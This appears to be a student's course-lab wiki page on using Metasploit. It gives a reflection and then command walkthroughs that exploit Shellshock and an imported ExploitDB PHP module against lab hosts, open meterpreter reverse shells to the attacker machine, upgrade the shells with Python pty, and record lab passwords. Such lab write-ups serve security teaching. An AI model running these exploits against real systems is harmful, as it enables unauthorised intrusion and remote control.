Week 11 Metasploit Framework (SEC 335) - Chromosom3/TechNotes GitHub Wiki

Reflection

This lab was intresting. This was my first experience using the Metasploit framework. I can see how this tool can be extremley helpful in simplifying the process of penetration testing. I did run into some issues setting up a module from ExploitDB. Once I spent some time tinkering with it I became more familiar with metasploit and was able to get the module loaded. I am glad that we started doing things manually instead of starting off with Metasploit. Though Metasploit is great, I think learning the fundamentals is crucial step in unerstanding what is happening in the background.

Metasploit

Basic Metasploit Use Against Cupcake

The following comamnds will allow you to attack the system “cupcake” using Metasploit.

# Start the Metasploit Console
sudo msfconsole
# Specify the vulnerability (Apache 2 in this case)
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# View the options for the vulnerability
options
# Set the RHOSTS option
set RHOSTS 10.0.5.23
# Set the TARGETURI option
set TARGETURI /cgi-bin/status
# Show all the available payloads 
show payloads
# Change the payload
set paylod [Payload ID or Payload Name]
# Defautl payload is the meterpreter reverse shell 
# Set the LHOST Value (Your machine)
set LHOST 10.0.99.36
# Set the port
set LPORT 443
# Execute the exploit and gain shell
exploit
# exit the shell while mainting it
background
# list all active meterpreter sessions 
sessions -i 
# Reconnect to a session 
sessions -i [ID]
# Get user information in meterpreter
getuid
# Get a shell on the target system
shell 
# Terminate Channel (Shell)
Ctrl + C

Note

When using simple reverse shell’s you can use the following Python 3 command to upgrade the shell. On some systems you can run python on others you need to do pyton3.

python -c 'import pty; pty.spawn("/bin/bash")'

Adding a Module to Metasploit (Nancurinir)

The following commands were used to exploit a vulnerability on the system “nancurinir”. The module that was used was not a standard module and was imported from ExploitDB. The Module can be found at this link: https://www.exploit-db.com/exploits/45020. Refer to to commands below to import and run the exploit module with the default payload.

# Search for the Exploit in Searchsploit
searchsploit 45020
# This is the path shown to us in the searchsploit results:
# php/remote/45020.rb
# We need to make some changes to the root user's home directory so lets switch to root
sudo -i 
# Make the directory for the custom module. This is taken from the searchsploit results
mkdir -p $HOME/.msf4/modules/exploits/php/remote/
# Copy the searchsploit code to the new directory
cp /usr/share/exploitdb/exploits/php/remote/45020.rb /root/.msf4/modules/exploits/php/remote/
# Update the database of files names used by locate 
updatedb

# Launch the Meatasploit Framework
msfconsole
# Set the exploit to our newly imported one 
use exploits/php/remote/45020
# View the options for the exploit module 
options
# Set the options that need to be changed
set PASSWORD shallnotpass
set USERNAME gandalf
set RHOSTS 10.0.5.28
# Set the options for the payload
set LHOST 10.0.99.36
set LPORT 443
# Run the exploit
exploit
# Exit the meterpreter session but keep it open
background
# View session information or connect back to the session
sessions -i [id]
# Launch a shell on the target 
shell
# Upgrade the simple shell with Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Switch user
su gandalf
# gandalfthewhite